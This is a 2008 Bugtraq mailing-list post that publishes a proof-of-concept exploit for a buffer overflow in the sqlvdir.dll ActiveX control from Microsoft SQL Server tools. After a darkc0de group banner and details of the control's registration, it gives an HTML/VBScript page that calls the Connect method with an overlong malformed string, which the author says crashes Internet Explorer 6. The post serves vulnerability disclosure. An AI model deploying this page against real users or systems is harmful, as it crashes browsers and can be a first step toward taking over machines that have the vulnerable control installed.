[<prev] [next>] [day] [month] [year] [list]
Message-Id: <200809111021.m8BAL6H4022144@www5.securityfocus.com>
Date: Thu, 11 Sep 2008 04:21:06 -0600
From: beenudel1986@...il.com
To: bugtraq@...urityfocus.com
Subject: sqlvdir.dll ActiveX Remote Buffer Overflow Exploit
# est.2007 \/ \/ forum.darkc0de.com #
################################################################
# --d3hydr8 -rsauron-baltazar -sinner_01 -C1c4Tr1Z - r4s4al #
# ---QKrun1x-P47tr1ck - FeDeReR -MAGE -JeTFyrE #
# and all darkc0de members ---#
################################################################
#
# Author: Beenu Arora
#
# Home : www.BeenuArora.com
#
# Email : beenudel1986@...il.com
#
# Share the c0de!
#
################################################################
#
# sqlvdir.dll ActiveX Remote Buffer Overflow Exploit
#
# Successfull exploitation crashes the Browser
#
# Tested On : WinXp Sp-2 IE 6.0
#
#################################################
# Loaded File: C:\Program Files\Microsoft SQL Server\80\Tools\Binn\sqlvdir.dll
# Class SQLVDirControl
# GUID: {FC13BAA2-9C1A-4069-A221-31A147636038}
# Number of Interfaces: 1
# Default Interface: ISQLVDirControl
# RegKey Safe for Script: False
# RegkeySafe for Init: False
# KillBitSet: False
#################################################
<html>
Test Exploit page
<object classid='clsid:FC13BAA2-9C1A-4069-A221-31A147636038' id='target' ></object>
<script language='vbscript'>
targetFile = "C:\Program Files\Microsoft SQL Server\80\Tools\Binn\sqlvdir.dll"
prototype = "Sub Connect ( [ ByVal szServer As Variant ] , [ ByVal szWebSite As Variant ] )"
memberName = "Connect"
progid = "SQLVDIRLib.SQLVDirControl"
argCount = 2
arg1="defaultV"
arg2="http://test\test\test\te?s\test\test\tes\ttest\test\te@st\tes\test\test\tes.\ttest\test\test\tes\test\test\te.s\ttest\test\test\tes\test\te
st\tes\t\\\\\\\\\:#$%test\test\test\te?s\test\test\tes\\:#$%\ttest\test\te@st\tes\test\test\tes.\ttest\test\test\tes\test\test\te.s\ttest\test
\test\tes\test\test\tes\t\\\\\\\\\:#$%test\test\test\te?s\test\test\tes\\:#$%\ttest\test\te@st\tes\test\test\tes.\ttest\test\test\tes\test\tes
t\te.s\ttest\test\test\tes\test\test\tes\t\\\\\\\\\:#$%test\test\test\te?s\test\test\tes\\:#$%\ttest\test\te@st\tes\test\test\tes.\ttest\test\
test\tes\test\test\te.s\ttest\test\test\tes\test\test\tes\t\\\\\\\"
target.Connect arg1 ,arg2
</script>
Powered by blists - more mailing lists